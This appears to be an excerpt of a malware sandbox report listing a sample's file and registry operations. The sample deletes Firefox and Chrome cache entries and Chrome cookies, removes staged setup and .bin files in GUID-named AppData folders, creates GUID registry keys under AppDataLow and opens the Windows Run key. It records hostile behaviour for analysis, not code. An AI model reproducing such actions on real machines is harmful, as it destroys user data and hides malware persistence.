Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\2E2D3BD78AAC7DD8EC8B5CA26C36A64A912EA68B - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\2E78209F2BD7068695BB80AAE0D3E5F19A372BCA - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\2EAFF2699FCEE0EDFEF4FF824C07727F657B0D45 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\2F0A7F5A4CF50FBAA8EC8FB9F3EBEF7461E5FA83 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\2FD2E2A71F89E3A92F68CB796207228217259289 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\2FEB6245AA212EA51F79468084964097925BD6D6 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\311C19847187CC20C5A8A21FA39C6639F5BBCF67 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\31220725946AC054F523C4029C40CA22A7A42621 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\31592C8B017CA0508B5F0339E7E1EA46376F2D31 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\317E80FB14217F5F6E8EAB3C4982A166EBEDBC9C - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\3194BBD824DE5F4E0F44B99C71BB6C700199B487 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\31F8F1DF56894B1D3F2180DB7128624160D6FD5E - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\3221C03D33E21E6F8B41DB86EB7B6527177AD6F9 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\32AFE38EED991EA004851E7C968397C7D9EA501C - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\32B6927A1EB46E83B230070265358A1C5B788D11 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\3313B622F3B9896C056CB0A1A534E4C91732E665 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\338233A5FF4B5082E562A4B5BFBCDB2581DE81E6 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\339A4E96E26DFFA4704F0AF081D2B85B12D03939 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\33A34037B96BD19CC90C0A382CEDF384EE052FCC - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\33B10E2C53E1205B7527185F086F1BD9A39B07CD - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\33E49DB212B852799023F439D16990005F93C4F7 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\33E659B30B4E594B210633855AC841A47BB4BBB9 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\346330431993BC995E9F9C114FE39FD5B54EB7DF - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\34CEF73D25CB0DE8A1CD86FB09EF24D17790BCA7 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\3502F57243FBD8F9D25E093A72D603074783A304 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\356FCE9F932692DC643481DBA1ABEA937B629F58 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\35933C361338037A97583E92DA61C299851A9B4E - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\36A422C04312727A6116F45E357EDA80B3B4A6FD - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\36C5C19636CA8995D6ADCD176668444451854326 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\36DBE72541419953BE4A8BD61964782F4DBEDECF - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\376ED25A1DE94F0D96E985E5D5CACFCFE3812131 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\37B0298825F693E093744779A7278E41F1419493 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\37B4BC98C8FDD6283BE80C5CC385582FEF5D6747 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\37BC32B4B7033C1AB388018EC734B639086C814E - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\383704E4BB07D527519A7352BA38B681C661FD8F - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\38819CF0EDDF28F6C7AE4A62EA2DC0E07EA71115 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\39CC8AA9054EC6244CA281EEA4BD937517E2861D - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\39D606C35C00ADA6E9320E1F6431E5A33EB42182 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\3A554E4EFCC1FAD19E963D27B9A2BF73C9664268 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\3A6C331288F156E9A07E3EA398F3A8FAF0530D8F - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\3B3EDC129FE6ED020C044AC637791DEC8B6B7603 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\3D896079491CA68DD9BB6DB7E612C8DC74463279 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\3DE1033D1165F9D849E6DFD8566ABB9179DB1D0F - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\3E42820479FADF666581B0704FA4AF901AE0E045 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\3EA580E2FD537915B7084615630F0189274B1F60 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\3FAECD8F44CECB41F5586C0DC333275FC173593A - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\3FB6DE7747DC1B658385638D277CF2D620D232E4 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\400E86363026A9AC2DCD2221C145C6370E3E8EDA - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4030DFFE47D5B75257AA7A8C0A26B737E2F00FF3 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\40645D76E586E360D63982B2D4525920F0CF3060 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\406839CA18775158E58D75B2837624917D7E685C - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\407EB4DE353DE3AD4E1A29F0E0E84F65C2CE6E3A - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\41367369B0154D1D2566CC216318C71115E089A2 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4238786CB87B503754EE13346F30AE3FCE28174F - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\425AB3A135AC92C5F7A29092F686A777B30A8C0A - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\42C23BB7242DFE074931A302B5BEB9B1D73B0BA5 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\431BDCA04B51BE586DFCF48431166463879B3DBF - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\434A5C8B5D0BEF67CEEB6076803A286CAE99C8C9 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\43686105AC844B29A19E4AD788A5ABBD2714FC75 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\438AB448ED7FB7D99CB7CFAB433F9E19A475D0EF - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\43A641B524487AFDAC7A8AF548EE196228BF6EAE - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\44437BAE601C72F5ED96953EAE92C527D4C2D46F - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4453CB40F54977CDF96034A3A658080FDA7E43FA - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\445E695F447CA967C4DAE00C80034130290F80EA - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\45A759AC8024EF1FCC5ECA005CEB9C4A4F78984E - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\45C64E5C2E9809667C5FC9F06FC42641326DF768 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4613B437E86D18E98F830433A5E6F7F9ABAF3693 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\467A961D019F23E5AF0F0266CD78A5F3D3290E5B - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\489059ED134C75D04357FD895C6280E1F7978C59 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\48D18A403364708B74676D0C5068809EE47BCF43 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\491836973BD7F16266314A8709EF00934A1BFCA0 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\491FFC0D1E910DC1DB3107E7DA730B43A97010A0 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4A46AC76F0CCC4293CC380999116F3B7911F85BE - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4B18B5ADA8BF2E475961694931BE215AED8ECBD5 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4B2A0DFA12FEADFF375261309F704B43534BEE37 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4BB6AC032612F432B6B5DA43EE2DAA6A8A03B6F4 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4C7EAEF07520B2C9900CFE06971368FF939AA197 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4CAD791F9C35BB747A46BAC7BE30A1E3BC028262 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4CF1AED5BBD3500653D8E2D1ACE09C58CF2D6182 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4DCE88D30F65C9460CC26665BC0A65F3234FA3D4 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4DEBFBF420A31CFDD61418B1BE3ADB580389730E - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4EFB15999EE57EDBFAADF69D6A31D8C6F90FE8DC - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4F0C54EEF677196E2899E5E79B4F3A906E46F926 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4F21DDD23480F1D4FBA13115BADB18B9AD18D8B1 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4F372C9418B79051ABED288900CDF3D20C12F38C - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4F680E68B8C682B5D2540FA7BE7B7F0D7521D9C9 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4F78D1F2D9B48D34C6259CF59FD5E171B97EFB3A - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\4FC872C4A3A8739207D005A676C19DAB518FA53B - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\514D7C625328106E43CEC7FD7CF71AEDA0A3101F - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\522FF036651FEA29F227BFB14BD934175DDBA62A - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5289F8C4AB5388DE2FCD562674EDF6674FB6DD30 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\529CD0D4C166C4989BAABA7E5FF50F75FB1D22D3 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\52ECE00B624C0C246123D20C46C3EE4F390A42FE - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\539C21F72CC831D883A265394E7125EFC208B096 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\53DAE4B1D7BFF6744CCAF7207DE631267F9883DC - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\53E9CAA90A10C82CF9C2D5393B332D17B263105E - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\54BF6D9D46D035228AC887ABC41B451F2BA38C02 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5588A68FFECF7B388E18C33727BF06B30B837DF1 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\559737B84286037BF56FE9E46C53581FB6FF6751 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\56945BFE2B00EED1BE4F7B1F389030A0AF203742 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\56B48B214C8C7AC2CE81EFC4F92C4550FB675AE9 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\56C1D667A6AFD5406F830882D54923461E079C1B - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5740B2DD533A74C3D20DD1D045CF7090D3BFB1AC - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\577655B6F15A0EEA0864C0703652DE24C091B634 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5781F439935B6472D7D312E75A3B766C3E30CF60 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\579EC9227C4A988DCC4894D82AA161957107515D - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\57E662573FD9E42D3972BE92D3DF0557C7B2E836 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\57FB9388D9B054D289CC913E797B5C5217B6A217 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\58A845FD76589B14EF62BB6CFEA62DB0C7CCFBBE - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\58BFE77FA719F36CE48D4A317C753C845C38FE29 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\59248032DB55D8A9E0296A51BC66F3DEA6028EA5 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\592BC6129BB410343931D35AFB0FE270C66E58F0 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\59BB52B352DE6D0ED5D0376B33855D43CA80B3F7 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\59D05F1B38666C8EF68BDEE20A28647F754464F6 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5A39FCB4CCAE4A6C76307026D7C882B4AE85B1F9 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5A6EEC1674DA4669A4FF612E7924A91FBF501426 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5AF1F43361120818C2E543605F5DF938574B1EDC - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5B1B55B57E2440A52DE3FED7E02C83E04A78B0FD - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5B928BD544BA66929A709C6AEC9D5968DCB905A1 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5BDDE6C7804D11CE399AF314C3D33E47FBAE7C88 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5C30F12D68A505E4AE0A6A3D896A1EC9C549AE96 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\cache2\entries\5D3D330EFBD2B9CD6EB45919D9403F605414EFA5 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000008 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000b - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000c - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000d - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000e - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000f - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000010 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000011 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000012 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000013 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000014 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000015 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000016 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000017 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000018 - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001a - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001b - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001c - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001d - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001e - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001f - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\index - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cookies - True 1
Fn
Delete C:\Users\CIIHMN~1\AppData\Roaming\MICROS~1\{25E2F~1\setup.inf - True 1
Fn
Delete C:\Users\CIIHMN~1\AppData\Roaming\MICROS~1\{25E2F~1\setup.rpt - True 1
Fn
Delete C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin - True 1
Fn
Delete C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{25E2F79F-402D-9FBF-7229-7443C66DE827}\01D4756785E0F97F09 - True 1
Fn
Registry (2883)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530\Files - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 2
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
